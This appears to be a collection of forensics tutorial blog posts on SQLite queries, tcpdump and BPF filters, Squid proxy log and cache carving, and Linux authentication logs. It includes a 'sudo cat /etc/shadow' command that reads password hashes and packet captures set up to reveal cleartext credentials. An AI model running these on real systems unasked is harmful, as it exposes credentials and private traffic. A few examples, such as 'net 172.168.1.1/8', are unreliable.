
- Forensic Analysis of SQLite Databases
SQLite databases are widely used across multiple platforms, including mobile devices, web browsers, and desktop applications. Forensic analysts often encounter SQLite databases during investigations, making it essential to understand their structure and the tools available for analyzing them.
Understanding SQLite Databases
SQLite databases consist of multiple files, each serving a specific purpose. Identifying these files is crucial during forensic investigations:
Main Database File: Typically has extensions such as .db, .sqlite, .sqlitedb, .storedata, or sometimes no extension at all.
Write Ahead Log (WAL): A .wal file that may contain uncommitted transactions, providing additional forensic insights.
Shared Memory File: A .shm file that facilitates transactions but does not store data permanently.
Analyzing SQLite Databases
An SQLite database consists of tables that store data in columns. Some databases have a single table, while others contain hundreds, each with unique schemas and data types. When performing forensic analysis, it's important to understand how these tables interact and how data is stored.
Tools for SQLite Analysis
Forensic analysts use various tools to examine SQLite databases. These tools fall into three main categories:
GUI-Based Viewers: User-friendly tools like DB Browser for SQLite allow visual analysis but may automatically merge WAL file transactions into the main database.
Command-Line Utilities: Tools like sqlite3 provide a powerful way to run queries and extract data, making them ideal for scripting and automation.
Forensic-Specific Tools: These tools offer advanced recovery features, allowing analysts to examine deleted records and unmerged transactions.
Querying SQLite Databases
Once the database structure is understood, analysts can run SQL queries to extract relevant information. Below are key SQL operations commonly used in forensic investigations:
1. Using the SELECT Statement
The SELECT statement retrieves data from a table. The simplest form is: SELECT * FROM fsevents;
This retrieves all columns from the fsevents table. However, for targeted analysis, selecting specific columns is more efficient: SELECT fullpath, filename, type, flags, source_modified_time FROM fsevents;
When multiple tables share column names, it's best to qualify the column with the table name: SELECT access.service, access.client FROM access;
2. Converting Timestamps
Many SQLite databases store timestamps as large epoch-based integers. Chrome, for example, stores visit_time as microseconds since 1601-01-01, which is why the query below divides by 1,000,000 and subtracts 11,644,473,600 to reach the Unix epoch before converting. Converting timestamps to a readable format is crucial for timeline analysis: SELECT url, visit_time, datetime((visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM visits;
The AS keyword renames the column for better readability.
3. Using DISTINCT to Find Unique Values
The DISTINCT keyword helps identify unique values within a column. For instance, to list the unique URLs in the urls table: SELECT DISTINCT url FROM urls;
4. Using CASE for Readability
To make data more understandable, analysts can use the CASE expression to replace numerical values with meaningful labels: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls
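A practical way to run these queries during an examination is the sqlite3 command-line shell against a working copy of the evidence. This is a minimal sketch, not a prescribed workflow: the ./evidence/History path is an assumed copy of a Chrome History database (copied together with any -wal and -shm files), and -readonly keeps the shell from writing to it.
sqlite3 -readonly ./evidence/History <<'EOF'
.headers on
.mode column
SELECT url, visit_count,
       datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch') AS last_visit
FROM urls
ORDER BY last_visit DESC
LIMIT 20;
EOF
Working on a copy also preserves the original WAL for tools that can parse unmerged transactions separately.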
5. Sorting Data with ORDER BY
Sorting records chronologically can help establish an event timeline. The ORDER BY clause arranges records based on a specified column: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls ORDER BY last_modified DESC;
6. Filtering Data with WHERE and LIKE
For large datasets, filtering results is essential. The WHERE clause helps narrow down data based on conditions: SELECT url, visit_count, CASE hidden WHEN 0 THEN "visible" WHEN 1 THEN "hide" END AS Hidden, datetime((last_visit_time / 1000000) - 11644473600, 'unixepoch', 'localtime') AS last_modified FROM urls WHERE last_modified LIKE '2025-01-16%'
The % wildcard allows partial matches, making it useful for date-based searches.
-----------------------------------------------------------------------------------------------------------
Conclusion
SQLite database forensics plays a crucial role in digital investigations, from mobile forensics to malware analysis. By understanding SQLite file structures, using the right tools, and applying effective query techniques, forensic analysts can extract valuable insights from databases.
-------------------------------------------------Dean-----------------------------------------------
- BPF Ninja: Making Sense of Tcpdump, Wireshark, and the PCAP World
Hey folks! Today we’re diving into a topic every network forensic analyst must get familiar with: tcpdump and the power-packed world around it— Wireshark , pcap , pcapng , and all the little details that actually matter when you're dealing with real-life packet analysis. If you’re like me and enjoy understanding why a tool works the way it does (and not just copy-pasting commands from Stack Overflow), this blog’s for you So, What’s tcpdump and Why Should You Care? Imagine this: You're investigating suspicious traffic, and all you’ve got is command line access. You need something light, fast, reliable—and boom— tcpdump comes to your rescue. It’s a CLI-based packet capture tool that lets you sniff traffic in real time, apply filters, and save packet data for analysis. Originally born in the *NIX universe , it now works on Windows too. Pretty cool, right? Under the hood, tcpdump uses the legendary libpcap library, which is like the oxygen tcpdump breathes. Here's what makes it so useful: 💡 Key Superpowers of tcpdump (Thanks to libpcap): 🔍 1. BPF (Berkeley Packet Filter) This is a simple filtering language that lets you capture only the traffic you want . For example: tcpdump port 443 and host 192.168.1.9 Boom—you’re only grabbing HTTPS packets to/from that host. 💾 2. Capture or Save Packets You can choose to display packet headers on-screen, or save them into .pcap files to analyze later. These files are gold for forensic investigations. Imagine capturing something today and analyzing it 3 years later—yep, pcap has your back. 🔁 3. Live or Offline tcpdump can sniff a live interface or read from a saved .pcap file as if it’s a live stream. That’s super helpful when you’re analyzing a case retrospectively. 📏 4. Snaplen Control Don't want to capture entire packets because of size or legal constraints? Use -s to define the snap length (i.e., number of bytes to capture per packet). Capturing just the headers? No problem. tcpdump -s 96 -i eth0 -w output.pcap 🧠 Heads-Up: tcpdump Is for Capturing, Not Deep Diving tcpdump is great for capturing data, but it doesn’t do fancy analysis . When you want to dissect those packets like a digital autopsy, you bring in the big gun: Wireshark . 🐟 Enter Wireshark: Your Friendly GUI Packet Analyzer Wireshark is a graphical application that reads .pcap and .pcapng files, and honestly, it's a lifesaver when you're trying to figure out what went down on the wire. It decodes hundreds of protocols out of the box and lays everything out for you in a beautiful 3-pane display. What makes Wireshark insanely useful: Auto-dissectors for common protocols Follow TCP Stream feature for full conversation analysis Color-coded filtering Click-and-zoom details for every packet field Pro tip: You can capture packets directly in Wireshark, but for high-volume environments or remote machines, stick with tcpdump. 📟 Want CLI Power with Wireshark's Brain? Use tshark Wireshark also comes with tshark , its CLI twin. So you can build your filters in Wireshark’s GUI and then export them to tshark scripts—perfect for large-scale or automated analysis. tshark -r test.pcap -Y "http.request.method == GET" 📂 What’s Really Inside a .pcap File? Okay, this is where things get forensically juicy. A .pcap file is not just a bunch of packets thrown together. It includes metadata that matters: File Header Includes: Magic Bytes: Helps identify it as a pcap file. Most common = 0xd4c3b2a1 (little-endian). Version: For libpcap compatibility. 
Timestamp Offset: Usually zero (all timestamps are in UTC—thank god). Snaplen: Max bytes per packet saved. Link Type: Like Ethernet, Wi-Fi, etc. Each Packet Entry Has: Timestamp (seconds + microseconds since epoch) Captured Length Original Packet Length (in case it was truncated) These tiny details help determine whether you lost data during capture or were just intentionally limiting it. 📦 pcapng: The Next-Gen Format (but Be Careful) Then comes pcapng —aka pcap Next Generation . It’s more flexible and stores: Multiple interfaces in one file Rich metadata (like capture comments) Higher-res timestamps Interface stats and DNS logs Sounds awesome, right? But here’s the catch : Not all tools support it properly . Even some versions of tcpdump can’t read pcapng without throwing vague errors. So what do we do? Convert it to regular pcap using editcap (comes with Wireshark): editcap -F pcap captured_file.pcapng capture_file.pcap Double-check with: file capture_file.pcap And voilà—you’re back in business. 🛠️ Thoughts: tcpdump and Wireshark = A Power Combo Here’s how I look at it: Use tcpdump for quick, controlled, stealthy captures (especially remotely or over SSH). Use Wireshark for visual, detailed, protocol-level analysis. Use tshark when you need scripting and automation. Stick to pcap unless you absolutely need pcapng features. Always verify your captures. A truncated packet can break your case. -------------------------------------------------------------------------------------------------- Lets talk about BPF Filters We’re diving into something that might sound dry but is actually one of the most powerful tools in your network forensics and incident response toolkit: BPF (Berkeley Packet Filter) syntax . Now, if you’ve worked with tcpdump, Wireshark, or even snort or bro/zeek, you’ve already touched BPF . Think of it like your VIP bouncer at a nightclub—BPF decides what packets are "interesting" enough to get through the door and what gets kicked to the curb. 🧹 So why should you care? Because it’s super-efficient , running close to the kernel, and helps you cut down on noise , saving time and resources during investigations or live captures. 🧠 What Even Is BPF? At its core, BPF is a way to tell your system, “ Only give me the packets I care about.” It’s a language that lets you define filters for capturing or processing packets. Since tools like tcpdump and Wireshark use libpcap under the hood, BPF filters work across most major packet capture tools. That’s why learning it once pays off everywhere . 🧱 BPF Primitives: The Basics Let’s say you're filtering water through a sieve. The holes in that sieve are your BPF filters . The smaller and more specific the holes, the more precise the capture. Here are the building blocks (called primitives ): ip, ip6, tcp, udp, icmp: Protocol matchers. ip is IPv4 traffic. ip6 is IPv6. If you want both: ip or ip6. host: Filters packets by IP address (Layer 3). Example: host 192.168.1.1 ether host: Filters by MAC address (Layer 2). Example: ether host 00:11:BA:8c:98:d3 net: Filters by network range (CIDR). Example: net 172.168.1.1/8 port: Filters by TCP/UDP port (Layer 4). Example: port 443 (catches both TCP and UDP unless specified) portrange: A range of ports. Example: portrange 20-25 💡 Tip: BPF is stateless . It evaluates each packet independently, so if you're tracking a flow or multi-step exchange, that's handled in higher layers (e.g., Zeek, Suricata). 🔄 Directional Filters: src, dst, both? 
Sometimes, you don’t want all traffic to/from an IP—maybe just the ones sent by it. Here’s how direction works:
src host 192.168.1.1 → only source.
dst port 443 → only destination.
ether src 00:11:BA:8c:98:d3 → source MAC.
src net 172.16.0.0/12 → source anywhere in that network range (note: the bits after the prefix length must be zero, or tcpdump will reject the expression).
⚠️ Note: When you say just host, port, or net, it’s bidirectional. Be specific if needed!
🧮 Combining Filters: AND, OR, NOT
This is where it gets fun (and powerful). You can combine primitives logically: tcp and (port 80 or port 443) and not host 192.168.1.1
⬆️ That says: “Give me all TCP traffic on ports 80 or 443, but exclude anything involving 192.168.1.1.”
📌 Wrap complex filters in quotes, especially in shell commands. Shells interpret parentheses and spaces—don’t let that ruin your day.
🧪 Advanced Primitives (Forensics-Friendly)
You’ll probably need these in more forensic-heavy cases:
vlan 100 → Capture traffic on VLAN 100.
gateway → Detect packets with mismatched Layer 2/3 addressing (good for catching rogue devices).
Byte offsets & bitmasks → Ultra-specific matching based on packet byte positions. (More niche, but very powerful!)
🧰 Tcpdump Tips for Real-World Use
Let’s be honest—tcpdump can do a LOT more than just watch packets fly by your screen. Here are some gold-nugget options:
-i any: Capture from all interfaces.
-n: Disable DNS resolution (important for stealth & speed).
-r file.pcap: Read from a PCAP instead of live traffic.
-w out.pcap: Write captured packets to a file.
-C 5: Rotate output every 5MB.
-G 30: Rotate output every 30 seconds. Use with -w and time-formatted filenames like: -w dump_%F_%T.pcap.
-W 10: Keep only the last 10 files (used with -C or -G).
-F filter.txt: Load a complex BPF filter from a file instead of typing it inline. Super helpful in team environments.
🎯 Real-Life Example: Reducing a PCAP for Wireshark
Imagine you’ve got a 500MB pcap file but Wireshark can barely open it. You want to reduce it to something smaller—say, only traffic on HTTP/S or exclude noisy DNS and multicast. Here’s how: tcpdump -n -r full_capture.pcap -w reduced_capture.pcap 'tcp and (port 80 or port 443) and not port 53 and not net 224.0.0.0/4'
(224.0.0.0/4 is the multicast range; the net primitive needs the network address itself, not a host address, with that prefix length.)
💡 This can cut the file size by almost 40–50% if the excluded traffic is significant.
📚 TL;DR - Quick Reference
Use quotes! 'port 80 and not host 10.0.0.1'
Know your direction: src, dst, host, ether host
Reduce noise: Use -n to disable DNS, and filter early
Modularize filters: Use -F for long BPFs
Save time: Use -C, -G, -W for file rotation
--------------------------------------------------------------------------------------------------
Before ending today’s article, I want to share a few commands which might be helpful for you. First, let’s admit it — network forensics can sound scary at first. You open up Wireshark or run tcpdump and BAM! — thousands of packets flying across the screen like it's The Matrix. Let’s jump into some cool and useful tcpdump commands with real-world examples and context.
Example 1: Live Sniffing on an Interface — But Keep It Light
sudo tcpdump -n -s 100 -A -i eth0 -c 1000
🧠 What it does:
Monitors the eth0 interface (you can replace it with yours).
Captures only the first 100 bytes of each packet (-s 100) to avoid dumping the whole packet — helpful for big networks.
-A dumps the actual ASCII content, which is super helpful for catching things like HTTP requests, cleartext creds, etc.
Stops after 1000 packets (-c 1000) so you don’t go blind.
-n speeds things up by not resolving DNS or port numbers — we want raw IPs and ports.
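One habit that saves a lot of pain: before starting a long capture, you can ask tcpdump to compile the filter without capturing anything. This is just a quick sanity-check sketch using tcpdump's -d option, which prints the compiled BPF program (or a syntax error) and exits:
tcpdump -d 'tcp and (port 80 or port 443) and not host 192.168.1.1'
If the filter has a typo or an invalid primitive, you find out immediately instead of discovering an empty pcap hours later.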
Example 2: Filter a pcap file for traffic from one host
tcpdump -n -r captured.pcap -w filtered.pcap 'host 192.168.1.1'
📂 You already have a .pcap file but you’re only interested in what one machine (say, 192.168.1.1) was up to.
-r captured.pcap: Reads the original pcap.
-w filtered.pcap: Writes only the filtered traffic.
'host 192.168.1.1': Our BPF (Berkeley Packet Filter) here matches both source and destination.
🧪 Try changing 'host' to:
'src host 192.168.1.1': only source
'dst host 192.168.1.1': only destination
Example 3: Rotate Files Daily for 2 Weeks — DNS Focused
sudo tcpdump -n -i eth0 -w dns-%F.%T.pcap -G 86400 -W 14 '(tcp or udp) and port 53'
🧠 What’s going on here:
We’re capturing DNS traffic only (TCP or UDP on port 53).
-w dns-%F.%T.pcap: Writes files with timestamps (great for organizing).
-G 86400: Rotates every 86,400 seconds = 1 day.
-W 14: Keeps only 14 files, so after 2 weeks tcpdump either stops or starts overwriting, depending on how you combine the options.
Perfect for long-term DNS analysis (e.g., DNS tunneling detection, malware beaconing).
Example 4: Rotating 100MB Files of Suspected APT Host Traffic
sudo tcpdump -n -i eth0 -w suspected.pcap -C 100 'host 192.168.1.1'
🔍 Use this when you want to capture unlimited traffic to/from a shady IP, but don’t want your disk to explode.
-C 100: Rolls over to a new file every 100MB. After the first file, tcpdump appends a number to the name: suspected.pcap, suspected.pcap1, suspected.pcap2, etc.
💡 Tip: Add -W to limit how many files you keep: -W 10
Example 5: Filter HTTP Traffic (not encrypted) and show requests
sudo tcpdump -i eth0 -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
😅 I know, this one looks scary. But here's what it's doing:
Matches only port-80 packets that actually carry TCP payload (so you skip empty ACKs and TCP keepalives).
-A + -s 0 dumps full ASCII of each packet — you can literally see GET and POST requests.
Real use case: Someone accessed your internal web app over HTTP. You suspect credential theft or command injection. This gives you a live view of the payloads.
Example 6: Capture suspicious outbound connections to multiple ranges
sudo tcpdump -i eth0 'dst net 185.100.87.0/24 or dst net 91.219.236.0/24'
🎯 This captures outbound traffic to known shady subnets. Perfect when you're watching beaconing or C2 callbacks.
You can expand the filter like this: '((dst net 185.100.87.0/24) or (dst net 91.219.236.0/24)) and not port 443'
👉 Exclude HTTPS to avoid noise!
Tips from Me
Always test your BPF filter on small captures using -c 100 to make sure it’s not too broad.
Wireshark’s filter syntax ≠ tcpdump syntax! In Wireshark, you use ip.addr == x.x.x.x, but in tcpdump you just say 'host x.x.x.x'.
Use tcpdump -D to list all interfaces.
When in doubt, log to file first, analyze later. Don't grep in real-time unless you know what you're doing.
Bonus: Convert pcap to readable text
Want to take a .pcap and turn it into readable logs? tcpdump -nn -tttt -r suspicious.pcap > readable_logs.txt
You’ll get timestamps + decoded traffic — perfect for incident timelines or report writing.
Final Words
Tcpdump is one of those tools that feels a bit raw at first, but once you get the hang of BPF filters, it's like having X-ray vision for your network. It's lightweight, powerful, and deadly accurate when used right. Combine it with tools like Wireshark for analysis and you've got a forensic powerhouse in your hands.
------------------------------------------------Dean-------------------------------------------------
- Proxies in DFIR– Deep Dive into Squid Log & Cache Forensics with Calamaris and Extraction Techniques
I’m going to walk you through how to analyze proxy logs—what tools you can use, what patterns to look for, and where to dig deeper—but keep in mind, every investigation is different, so while I’ll show you the process, the real analysis is something you will need to drive based on your case. Let’s talk about something that’s often sitting quietly in the background of many networks but plays a huge role when an investigation kicks off: Proxies . Whether you’re a forensic analyst, an incident responder, or just someone interested in how network traffic is monitored, proxies are your silent allies. 🧭 First Things First: What Does a Proxy Even Do? Think of a proxy like a middleman between users and the internet . Every time a user accesses a website, the request goes through the proxy first. This is awesome for: Monitoring user activity : Who went where, when, and what happened. Enforcing policies : Blocking sketchy sites or filtering content. Caching : Saving bandwidth by storing frequently accessed content locally. And the best part? Proxies keep logs . Gold mines for investigations. 🔍 Why Proxy Logs Are a Big Deal in Forensics When you're dealing with a potential breach or malware incident, one of the first questions is: Who visited what site? Now, imagine going machine-by-machine trying to find that out… 😫 That’s where proxy logs shine: ✅ Speed up investigations ✅ Quickly identify systems reaching out to malicious URLs ✅ Track timelines without touching each device individually And even better— some proxies cache content . So even if malware was downloaded and deleted from a device, the proxy might still have a copy in its cache. Lifesaver. 🐙 Enter Squid Proxy – A Favorite Squid is a widely used HTTP proxy server. If you’ve worked in enterprise environments, chances are you’ve run into it. 🧾 Key Squid File Paths: Config file: /etc/squid/squid.conf Logs: /var/log/squid/* Cache: /var/spool/squid/ These are your go-to places when digging into evidence. ----------------------------------------------------------------------------------------------------------- 📈 What You Can Learn from Squid Logs Squid logs tell you things like: Field Example What It Means UNIX Timestamp 1608838269.433 Date/time of the request Response Time 531 Time taken to respond (in ms) Client IP 192.168.10.10 Who made the request Cache/HTTP Status TCP_MISS/200 Was it cached? Was it successful? Reply Size 17746 Size of response HTTP Method GET Type of request URL https://www.cyberengage.org/ Site accessed Source Server DIRECT/192.168.0.0 Origin server IP MIME Type text/html Content type returned So from one single log line, you can know who accessed what , when , and how the proxy handled it. 🧠 Bonus Info: Cache Status Codes That Help You Analyze TCP_HIT: Content served from cache TCP_MISS: Had to fetch from the internet TCP_REFRESH_HIT: Cached content was revalidated TCP_DENIED: Blocked by proxy rules This gives you an idea of how users interact with sites and how often content is being reused. ----------------------------------------------------------------------------------------------------------- ⚠️ Default Squid Logs Are Good… But Not Perfect Here’s the catch: By default, Squid doesn’t log everything you might want during an investigation. For example: 🚫 No User-Agent 🚫 No Referer 🚫 Query strings (like ?user=admin&pass=1234) are stripped by default This can hurt if malware uses obfuscated URLs or redirects. But don’t worry—Squid is super customizable. 
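Even the default format is enough for quick triage, though. As a rough sketch (assuming Squid's native access.log layout, where field 3 is the client IP and field 4 is the cache/HTTP status), you can summarize who talked the most and how requests were handled:
awk '{print $3}' access.log | sort | uniq -c | sort -rn | head    # top client IPs by request count
awk '{print $4}' access.log | sort | uniq -c | sort -rn | head    # TCP_MISS/200, TCP_DENIED/403, etc.
Spikes of TCP_DENIED from a single host, or one client dwarfing everyone else's request count, are exactly the kind of lead you want before diving deeper.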
🔧 How to Improve Squid Logs for Better Visibility
You can change the Squid log format to include things like the User-Agent and Referer.
✅ Example Configuration (Put this in squid.conf):
logformat combined %>a %[ui %[un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh
%>a: Client IP
%tl: Local time (human-readable)
%rm %ru: HTTP method and URL
%>Hs: Status code (200, 404, etc.)
%<st: Size of the reply sent to the client
%{Referer}>h: Page that referred the user
%{User-Agent}>h: Browser or software used
%Ss:%Sh: Cache and hierarchy status
Boom. Now your logs are a forensic analyst’s dream.
🔍 Sample Human-Readable Log Entry
192.168.10.10 - - [30/Apr/2025:00:00:00 +0000] "GET https://www.cyberengage.org/...js HTTP/1.1" 200 38986 "https://www.cyberengage11.org/..." "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)... Firefox/47.0" TCP_MISS:HIER_DIRECT
From this one line, we can tell:
The user at IP 192.168.10.10 accessed a JavaScript file
The browser was Firefox on Windows
The request wasn't cached (TCP_MISS)
That’s a full story from one log entry.
-----------------------------------------------------------------------------------------------------------
🛑 But Wait—A Word of Caution!
Want to log query strings or detailed headers? You must change your config.
# In /etc/squid/squid.conf
strip_query_terms off
⚠️ Warning: This could capture sensitive data (like usernames/passwords in URLs), so make sure you’re authorized to log this. Respect privacy policies.
-----------------------------------------------------------------------------------------------------------
Alright, let’s get real. When you're looking at a Squid proxy for investigation, it can look like a mess of logs, cache files, and cryptic timestamps. But trust me, with the right tools and techniques, you'll be digging up web activity and cached secrets like a forensic wizard.
🛠️ Let’s Begin with a Tool – Calamaris
So first up, there's this pretty slick tool called Calamaris – great for getting summaries out of Squid logs. It's not fancy-looking, but it's efficient, and sometimes that's all you need. You can check out the tool here: Calamaris Official Page
To install it inside your WSL (Windows Subsystem for Linux), just run: sudo apt install calamaris
Boom. Installed. Now let’s analyze a Squid access log:
cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy/proxy2/squid/squid/access.log | calamaris -a
And just like that, it spits out a clean summary. Requests, clients, status codes—it’s all there. This makes the initial review of a log super simple.
🔎 BUT... there’s a catch. If your Squid logs use a custom format (which happens often in real environments), Calamaris might fumble. So if your output looks weird or incomplete, don’t panic—we’ll have to get our hands dirty and analyze stuff manually. Let’s keep going.
🕰️ Dealing with Timestamps – From Unix to Human
By default, Squid logs come with UNIX epoch timestamps. Unless you're a robot, they aren't human-friendly. But converting them is easy. Use this: date -u -d @1742462110.226
That -u gives you UTC format (ideal for timeline consistency).
Now you're thinking—"Akash, am I supposed to convert each timestamp manually?" Heck no. Here's a one-liner that’ll do the job for the entire log file:
sudo cat /mnt/c/Users/Akash\'s/Downloads/proxy/proxy2/squid/squid/access.log | awk '{$1=strftime("%F %T", $1, 1); print $0}' > /mnt/c/Users/Akash\'s/Downloads/readable.txt
This outputs a clean, readable version of your log into readable.txt.
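One more practical note before moving on to collection: if you do edit squid.conf to change the log format or set strip_query_terms off, Squid can sanity-check and reload the configuration without a full restart. A minimal sketch (paths and service names vary by distro):
sudo squid -k parse          # validate squid.conf syntax
sudo squid -k reconfigure    # tell the running Squid to re-read its config
That way a typo in a logformat line doesn't silently take your proxy, and your evidence source, offline.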
📂 Important Files to Collect in a Squid Forensic Investigation While you’re getting into the logs, don’t forget to grab these essentials: /etc/squid/squid.conf – Config file that tells you how the proxy works, where logs are stored, ACLs, cache settings, etc. /var/log/squid/access.log – The main access log (you’ll be here a lot) /var/log/squid/referer.log, /useragent.log, /cache.log, /store.log – All useful for understanding context like who clicked what, what browser they used, cache hits/misses, etc. 🔍 Starting Your Investigation – Log Hunting Let’s say you’re investigating activity around google.com . Start basic: grep google.com access.log Now you can narrow it down further. Want to see only GET or POST requests? grep "GET.*google.com" access.log Start building a timeline from here—this is your story-building phase in an incident investigation. ----------------------------------------------------------------------------------------------------------- 💾 Let’s Talk About Cache – One of the Juiciest Parts Squid caches web objects to speed things up. This means files , URLs , images , even docs might be sitting there waiting to be carved out. Default cache path: /var/spool/squid/ Here, cached files are stored in a structured format like: /var/spool/squid/00/05/000005F4 If you want to inspect these: grep -rail www.google.com /var/spool/squid/ Flags explained: -r: Recursively search -a: Treat files as ASCII -i: Case-insensitive -l: Show filenames only -F: Literal search (no regex overhead) Then use strings to dig deeper into the cache object: strings -n 10 /var/spool/squid/00/05/000005F4 | grep ^http | head -n 1 This gives you clean URLs that were cached. ----------------------------------------------------------------------------------------------------------- 📤 Extracting Actual Files from Cache Let’s say you found a cached .doc file and want to pull it out. Here's how: Find it: grep -rail file.doc ./ Example output: 00/0e/00000E20 Examine it: strings -n 10 00/0e/00000E20 Check for headers like: Content-Type: Cache-Control: Expires: This tells you what’s inside the file and why it was cached. Carve the file: Use a hex editor like ghex to open the file and locate the 0x0D0A0D0A byte pattern (that’s the HTTP header/body separator). Delete all the bytes before this pattern and save the result to a new file. Identify the file type: file carved_output If it says something like “Microsoft Word Document,” you’ve got your artifact extracted. Mission success! 💥 ----------------------------------------------------------------------------------------------------------- 🔗 Extra Resources You’ll Love Want to keep up with new tools for analyzing Squid? Bookmark this: 👉 Squid Log Analysis Tools List (Official) And don’t forget to explore another gem: 👉 SquidView Tool – Neat for interactive visual log analysis. ----------------------------------------------------------------------------------------------------------- 🧠 Final Thought Log and cache analysis in Squid isn't just about reading boring log lines. It's storytelling through network artifacts. From timestamps to URLs, from GETs to cached DOC files—every bit tells you something. The trick is not just knowing what to look for—but knowing how to get it out. If you're starting your journey with Squid forensics, this is your friendly roadmap. And hey, the more you do it, the more patterns you start seeing. It becomes second nature. ---------------------------------------------Dean----------------------------------------------------------
- Understanding Linux: Kernel Logs, Syslogs, Authentication Logs, and User Management
Alright, let’s break down Linux user management, authentication, and logging in a way that actually makes sense, especially if you’ve been on both Windows and Linux systems. 🔑 1. Unique Identifiers in Linux vs Windows First off, let’s talk about how users are identified: Windows uses SIDs (Security Identifiers) — long strings like S-1-5-21-... to uniquely identify users. Linux , on the other hand, uses UIDs (User IDs) for users and GIDs (Group IDs) for groups. 👉 Quick Tip: Regular user accounts start from UID 1000 and above. Anything below 1000 is usually a system or service account (like daemon, syslog, etc.). 📂 2. Where Is User Info Stored in Linux? 🧾 /etc/passwd This file holds basic user info : username , UID , GID , home directory , and shell (like /bin/bash or /usr/sbin/nologin). cat /etc/passwd You'll see entries like: akash:x:1001:1001:Akash,,,:/home/akash:/bin/bash 🔐 /etc/shadow This one is where the actual (hashed) passwords are stored — not in /etc/passwd. It’s restricted to root for a reason. sudo cat /etc/shadow You’ll notice hashed passwords that look something like this: akash:$6$randomsalt$verylonghashedpassword:19428:0:99999:7::: That $6$ means it’s hashed using SHA-512 . Other common password hashing algorithms in Linux: MD5 , Blowfish , SHA-256 , and SHA-512 . All of these use salting and multiple hashing rounds for added security. 👥 3. Managing Users in Linux (Commands You’ll Actually Use) Here are the most common commands: Command What It Does useradd Add a new user userdel Remove a user usermod Modify user properties chsh Change a user’s default shell passwd Set or change a user's password All of this ties into how Linux handles access and sessions. 🛡️ 4. How Linux Handles Authentication (Thanks to PAM) PAM stands for Pluggable Authentication Modules — and it’s the brain behind how Linux checks your credentials. 🗂️ Where are the PAM config files? /etc/pam.d/ : Main directory for PAM config files for individual services (like sshd, login, sudo, etc.) /etc/security/access.conf : You can use this to allow or deny users based on IP, group, etc. Example: -:akash:ALL EXCEPT 192.168.1.100 This means Akash can only log in from the IP 192.168.1.100. 🧩 PAM Modules Location These are .so files (shared object libraries) that do the heavy lifting. RHEL-based distros : /usr/lib64/security/ Debian-based distros : /usr/lib/x86_64-linux-gnu/security/ Think of them like Linux’s version of Windows DLLs but for authentication logic. 🔄 How PAM Authentication Works (Step by Step) User enters credentials (username + password). System loads PAM config from /etc/pam.d/*. Relevant modules get called from /usr/lib/.... Password is compared with the hash in /etc/shadow. If valid , session gets started. Authentication logs are written — usually in /var/log/auth.log or /var/log/secure. Access is granted or denied . Simple but powerful. --------------------------------------------------------------------------------------- 📜 5. Logging – Where to Look 🗂️ Where Does Linux Log Authentication Stuff? Linux keeps logs under the /var/log/ directory — that’s the central place where you’ll find all sorts of system and user-related logs. 1. /var/log/auth.log (Debian/Ubuntu systems) This is your go-to file when investigating: Logins via terminal, SSH, or sudo Session starts/stops Authentication failures and successes Use tail -f /var/log/auth.log to monitor real-time logins.For older, compressed logs, use: zcat /var/log/auth.log.1.gz. 
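For quick triage of that file, a couple of greps go a long way. A rough sketch (log line wording can differ slightly between distros and SSH versions):
grep -i 'failed password' /var/log/auth.log | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn | head   # top source IPs of failed SSH logins
grep -i 'accepted' /var/log/auth.log | tail -n 20                                                        # most recent successful authentications
A burst of failures from one IP followed by an "Accepted password" or "Accepted publickey" line is a classic brute-force-then-success pattern worth chasing.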
Also, fun fact: cron job logs land here too, because cron has to authenticate users before running scheduled tasks. 2. /var/log/secure (Red Hat/CentOS/Fedora systems) Same purpose as auth.log but without cron logs. So if you’re hunting down brute-force attempts or failed SSH logins on RHEL or CentOS, this is your place. 3. /var/log/failog This one specifically logs failed login attempts , but here’s the twist: On Ubuntu/Debian, it’s there, but only if you configure pam_faillock. On RHEL-based systems, it’s often not enabled by default. Use faillog -a to check all failed attempts. 4. /var/log/lastlog Want to know when a user last logged in? Boom — this file’s got you covered. Run lastlog -u akash to check last login time for user akash. Neat for checking dormant accounts or for basic auditing. 5. /var/log/btmp This file tracks failed login attempts , but it’s in binary format — so don’t try to cat it like a text file. Use lastb or lastb -f /var/log/btmp to view it cleanly. 6. /var/log/wtmp It logs all login/logout events, system reboots, and shutdowns. Run last to read it.Or for a forensic dump from a dead system: last -f /mnt/disk/var/log/wtmp 7. /run/utmp This file is more “live.” It tracks users currently logged in . Use who or w to view who's online right now. 🔍 How Long Are Logs Kept? Linux usually keeps logs for 4 weeks by default, rotating them weekly. Older logs get compressed (you’ll see .gz files). So for deeper dives: Use zcat or zless to view archived logs Use strings, hexdump, or a hex editor to read binary logs like btmp, wtmp, or utmp in raw forensics scenarios 🧪 Quick Command Recap Command Purpose last Shows logins/logouts from /var/log/wtmp lastb Shows failed logins from /var/log/btmp faillog -a View all failed login attempts who / w Shows currently logged-in users (from utmp) lastlog -u user Shows last login info from lastlog 🧠 Bonus: How Syslog and Kernel Logging Works in Linux Let’s talk Syslog — the backbone of Linux logging. Syslog isn’t a file — it’s a standard protocol used by system processes to send log messages to a log server (or local file). It’s used across services, from SSH to cron, and it categorizes logs by: Facility (like auth, kernel, daemon) Severity (info, warning, error, critical) Common Syslog Implementations: rsyslog (most common these days) syslog-ng journald (used with systemd) 🗂️ Key System Log Files 1. /var/log/syslog (Ubuntu/Debian) This is like a catch-all system log . You’ll find: Kernel messages App-level logs Cron logs Hardware issues It’s super useful when you’re not sure what exactly went wrong but want a timeline of everything. Use tail -f /var/log/syslog or grep through it to find events. 2. /var/log/messages (RHEL/CentOS/Fedora) Think of this as the Fedora-flavored syslog . It logs similar data — services, kernel messages, application errors — but it’s the default log file for those distros. Want to Go Pro Mode? You can even forward logs to a central log server using rsyslog or syslog-ng. Perfect for SIEM integration or enterprise setups. 🚨 